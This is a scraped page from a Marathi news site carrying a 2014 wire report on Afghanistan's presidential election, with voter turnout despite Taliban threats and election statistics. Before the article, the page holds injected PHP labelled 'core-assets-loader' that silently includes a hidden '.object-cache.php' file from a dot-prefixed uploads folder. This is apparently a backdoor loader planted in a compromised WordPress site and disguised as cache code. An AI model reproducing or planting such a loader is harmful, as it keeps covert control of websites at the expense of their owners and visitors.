add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दहशत झुगारून अफगाणमध्ये मतदान – SOCH INDIA
Menu

दुनिया
दहशत झुगारून अफगाणमध्ये मतदान

nobanner

रविवार ६ एप्रिल २०१४ एक नजर (06-04-2014 : 01:10:06) – करझाईंचा वारस ठरणार : पावसातही मतदारांचा उत्साह कायम काबूल : तालिबानची दहशत झुगारून लावत अफगाण नागरिकांनी शनिवारी राष्ट्राध्यक्षपदाच्या निवडणुकीत उत्साहाने मतदान केले. देशात पहिल्यांदाच लोकशाही पद्धतीने होत असलेल्या सत्तांतरासाठी मतदान केंद्रांवर मतदारांच्या रांगा लागल्या होत्या. एकीकडे देशाच्या अनेक भागात पडत असलेला मुसळधार पाऊस, तर दुसरीकडे तालिबानी हल्ल्याची टांगती तलवार अशी दुधारी कोंडी असूनही मतदांराच्या उत्साहात तसूभरही फरक पडला नाही व त्यांनी आपला कौल मतपेटीत टाकला. हल्ल्याची शक्यता असल्याच्या पार्श्‍वभूमीवर चोख बंदोबस्त ठेवण्यात आला होता. दरम्यान, मतदारांच्या अभूतपूर्व प्रतिसादामुळे मतदानाची वेळ एक तासासाठी वाढवून पाच पर्यंत करण्यात आली. तालिबानने निवडणुकीत सहभागी होऊ नये, अन्यथा मतदान केंद्र, मतदार आणि सुरक्षा कर्मचार्‍यांवर हल्ला करण्याचा इशारा दिला होता. गेल्या काही काळात राजधानी काबूलला दहशतवाद्यांनी लक्ष्य केले होते. या पार्श्‍वभूमीवर राजधानीत चोख बंदोबस्त ठेवण्यात आला. काबूल येथील राष्ट्राध्यक्ष भवनानजीकच्या एकाशाळेतील केंद्रावर करझाई यांनी मतदान केले. २00१मध्ये तालिबानी राजवटीचे पतन झाल्यापासून देशात नाटो सैन्य तैनात आहेत. नाटो सैन्याच्या उपस्थितीत पार पडणारी ही शेवटची निवडणूक आहे. (वृत्तसंस्था) च्८ उमेदवार निवडणूक रिंगणात च्२ कोटी ८0 लाख लोकसंख्या च्१ कोटी ३५ लाख मतदार च्६ हजार मतदान केंद्र च्१0% केंद्र असुरक्षित च्४ लाख सुरक्षा कर्मचारी तैनात च्५१ हजार नाटो सैन्य मदतीला च्२00१ मध्ये तालिबान राजवट खालसा च्१३ वर्षांपासून करझाई राष्ट्राध्यक्षपदी